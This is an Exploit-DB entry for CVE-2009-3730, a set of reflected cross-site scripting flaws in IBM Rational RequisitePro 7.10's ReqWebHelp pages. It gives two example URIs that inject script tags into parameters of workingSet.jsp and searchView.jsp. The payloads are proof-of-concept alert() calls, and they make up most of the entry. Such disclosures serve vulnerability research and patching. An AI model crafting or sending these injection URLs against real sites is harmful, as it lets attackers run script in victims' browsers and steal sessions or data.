IBM Rational RequisitePro 7.10 and ReqWebHelp Multiple Cross-Site Scripting

2009-10-15T00:00:00
ID EDB-ID:10094
Type exploitdb
Reporter IBM
Modified 2009-10-15T00:00:00

Description

IBM Rational RequisitePro 7.10 and ReqWebHelp Multiple Cross Site Scripting. CVE-2009-3730. Webapps exploit for jsp platform

                                        
                                            Attackers can exploit these issues by enticing an unsuspecting victim into following a malicious URI.

The following example URIs are available:

http://www.example.com/ReqWebHelp/advanced/workingSet.jsp?operation=add*/--></script><script>alert(289325)</script>&workingSet=

http://www.example.com/ReqWebHelp/basic/searchView.jsp?searchWord=>''><script>alert(306531)</script>&maxHits=>''><script>alert(306531)</script>&scopedSearch=>''><script>alert(306531)</script>&scope=>''><script>alert(306531)</script>